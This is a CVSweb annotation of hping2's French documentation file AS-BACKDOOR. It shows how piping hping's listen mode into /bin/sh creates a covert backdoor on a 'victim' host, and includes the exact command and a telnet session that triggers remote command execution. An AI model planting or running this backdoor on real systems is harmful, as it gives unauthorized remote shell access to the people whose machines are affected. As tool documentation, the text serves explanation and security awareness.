Annotation of embedaddon/hping2/docs/french/AS-BACKDOOR, revision 1.1.1.1

1.1       misho       1: hping peut être utilisé comme une backdoor (ndt : porte dérobée). Essayez
                      2: juste l'option -9 (--listen) et redirigez via un tube dans /bin/sh :
                      3: 
                      4: Mettez hping en mode listen (ndt : d'écoute) sur le système victime.
                      5: 
                      6: victim# hping -I eth0 -9 mysign | /bin/sh
                      7: 
                      8: Chaque paquet qui contient "mysign" sera traité par hping, tous les octets
                      9: qui suivent "mysign" dans les paquets seront envoyés dans la sortie
                     10: standard, ainsi par exemple je serai capable d'exécuter des commandes en
                     11: utilisant tous types de protocoles. Juste pour exemple je peux utiliser le
                     12: démon smtpd pour exécuter 'ls' sur la victime.
                     13: 
                     14: evil$ telnet victim 25
                     15: 
                     16: Trying 192.168.1.1...
                     17: Connected to nano (192.168.1.1).
                     18: Escape character is '^]'.
                     19: 220 nano.marmoc.net ESMTP Sendmail
                     20: mysignls;
                     21: 
                     22: sur la victime vous verrez :
                     23: 
                     24: victim# hping -I eth0 -9 mysign | /bin/sh
                     25: hping2 listen mode
                     26: bin   cdrom  etc     home  local-home  mnt   root  tmp  var
                     27: boot  dev    export  lib   lost+found  proc  sbin  usr
                     28: : command not found
                     29: 
                     30: Comme vous pouvez le voir j'utilise 'ls;' puisque sinon le shell recevra
                     31: juste ls^M. Le ";" force l'exécution de la commande (du moins avec bash et
                     32: zsh, vérifiez votre shell pour plus d'informations).
                     33: 
                     34: Ceci fonctionne avec tous les types de paquets IP valides non filtrés, le
                     35: niveau supérieur de protocole importe peu.
                     36: 
                     37: antirez <antirez@invece.org>

FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>